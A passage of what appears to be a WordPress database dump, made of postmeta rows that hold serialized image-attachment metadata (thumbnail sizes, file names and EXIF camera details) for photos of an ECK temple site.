lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_018-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_018-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_018-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_018-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_018-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1447076160\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.28\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1297,21690,'_wp_attached_file','2019/07/eck-logo-gray-sm.png'),(1298,21690,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:52;s:6:\"height\";i:51;s:4:\"file\";s:28:\"2019/07/eck-logo-gray-sm.png\";s:5:\"sizes\";a:1:{s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"eck-logo-gray-sm-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10848,125666,'_wp_attached_file','2019/08/ECK_Temple_CO_017-lg.jpg'),(10849,125666,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:824;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_017-lg.jpg\";s:5:\"sizes\";a:13:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_017-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_017-lg-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_017-lg-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_017-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_017-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_017-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_017-lg-250x140.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_017-lg-550x309.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:309;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_017-lg-800x450.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_017-lg-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_017-lg-534x300.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_017-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_017-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"PlayMemories Home\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1444398771\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10842,125663,'_wp_attached_file','2019/08/ECK_Temple_CO_014-lg.jpg'),(10843,125663,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_014-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_014-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_014-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_014-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_014-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_014-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_014-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_014-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_014-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_014-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_014-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_014-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"DSC-HX200V\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442660471\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.8\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6634,78665,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1808;s:6:\"height\";i:1200;s:4:\"file\";s:23:\"2019/07/rocks-water.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"rocks-water-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"rocks-water-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"rocks-water-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"rocks-water-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:21:\"rocks-water-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:23:\"rocks-water-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:23:\"rocks-water-250x166.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:23:\"rocks-water-550x365.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:23:\"rocks-water-800x531.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:23:\"rocks-water-271x180.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:23:\"rocks-water-452x300.jpg\";s:5:\"width\";i:452;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:23:\"rocks-water-753x500.jpg\";s:5:\"width\";i:753;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:23:\"rocks-water-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:23:\"rocks-water-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:24:\"rocks-water-1100x500.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10818,125651,'_wp_attached_file','2019/08/ECK_Temple_CO_001-lg.jpg'),(10819,125651,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:810;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_001-lg.jpg\";s:5:\"sizes\";a:13:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_001-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_001-lg-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_001-lg-768x439.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:439;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_001-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_001-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_001-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_001-lg-250x143.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_001-lg-550x314.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:314;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_001-lg-800x457.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:457;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_001-lg-315x180.jpg\";s:5:\"width\";i:315;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_001-lg-525x300.jpg\";s:5:\"width\";i:525;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_001-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_001-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1439985746\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.28\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:19:\"0.00047103155911446\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10820,125652,'_wp_attached_file','2019/08/ECK_Temple_CO_002-lg.jpg'),(10821,125652,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:642;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_002-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_002-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_002-lg-300x216.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:216;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_002-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_002-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_002-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_002-lg-250x180.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_002-lg-550x397.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:397;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_002-lg-250x180.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_002-lg-416x300.jpg\";s:5:\"width\";i:416;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_002-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_002-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10822,125653,'_wp_attached_file','2019/08/ECK_Temple_CO_003-lg.jpg'),(10823,125653,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_003-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_003-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_003-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_003-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_003-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_003-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_003-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_003-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_003-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_003-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_003-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_003-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442685012\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"32\";s:13:\"shutter_speed\";s:18:\"0.0031645569620253\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10824,125654,'_wp_attached_file','2019/08/ECK_Temple_CO_004-lg.jpg'),(10825,125654,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_004-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_004-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_004-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_004-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_004-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_004-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_004-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_004-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_004-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_004-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_004-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_004-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"iPhone 6 Plus\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442686639\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"32\";s:13:\"shutter_speed\";s:19:\"0.00088495575221239\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10578,123037,'_wp_attached_file','2019/08/spex-accord-3.jpg'),(10579,123037,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:179;s:6:\"height\";i:242;s:4:\"file\";s:25:\"2019/08/spex-accord-3.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"spex-accord-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"spex-accord-3-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"spex-accord-3-133x180.jpg\";s:5:\"width\";i:133;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"spex-accord-3-179x150.jpg\";s:5:\"width\";i:179;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1357,25071,'_wp_attached_file','2019/07/esc-temple-bgrid-1.jpg'),(1358,25071,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:231;s:6:\"height\";i:154;s:4:\"file\";s:30:\"2019/07/esc-temple-bgrid-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"esc-temple-bgrid-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:28:\"esc-temple-bgrid-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:30:\"esc-temple-bgrid-1-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0: